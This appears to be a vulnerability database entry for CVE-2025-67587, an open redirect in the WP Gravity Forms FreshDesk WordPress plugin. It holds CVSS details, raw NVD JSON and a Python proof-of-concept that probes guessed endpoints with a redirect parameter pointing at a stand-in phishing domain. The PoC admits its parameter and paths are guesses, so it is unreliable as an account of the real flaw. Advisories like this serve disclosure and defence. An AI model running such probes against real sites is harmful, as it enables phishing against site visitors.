Security Vulnerability Report
中文
CVE-2025-67587 CVSS 4.7 MEDIUM

CVE-2025-67587

Published: 2025-12-09 16:18:37
Last Modified: 2026-04-27 18:16:45

Description

URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks WP Gravity Forms FreshDesk Plugin gf-freshdesk allows Phishing.This issue affects WP Gravity Forms FreshDesk Plugin: from n/a through <= 1.3.5.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Gravity Forms FreshDesk Plugin (gf-freshdesk) <= 1.3.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-67587 Open Redirect PoC # Target: WordPress site with gf-freshdesk plugin <= 1.3.5 target_url = "http://target-wordpress-site.com" malicious_domain = "http://malicious-phishing-site.com" # Construct the malicious redirect URL # The exact parameter name may vary based on plugin implementation payload = f"?redirect_url={malicious_domain}" # Plugin-specific endpoint (examples, may vary) endpoints = [ "/wp-content/plugins/gf-freshdesk/includes/submit.php", "/wp-content/plugins/gf-freshdesk/freshdesk.php", "/" ] for endpoint in endpoints: exploit_url = target_url + endpoint + payload print(f"[*] Testing endpoint: {endpoint}") print(f"[*] Exploit URL: {exploit_url}") # Send request to check redirect behavior response = requests.get(exploit_url, allow_redirects=False) if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') print(f"[!] Open redirect detected!") print(f"[!] Redirects to: {location}") if malicious_domain in location: print("[!] Confirmed: Redirects to attacker-controlled domain") else: print(f"[-] No redirect detected (Status: {response.status_code})") print("\n[*] Note: This PoC is for authorized security testing only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67587", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:36.663", "lastModified": "2026-04-27T18:16:44.960", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "URL Redirection to Untrusted Site ('Open Redirect') vulnerability in CRM Perks WP Gravity Forms FreshDesk Plugin gf-freshdesk allows Phishing.This issue affects WP Gravity Forms FreshDesk Plugin: from n/a through <= 1.3.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gf-freshdesk/vulnerability/wordpress-wp-gravity-forms-freshdesk-plugin-plugin-1-3-5-open-redirection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}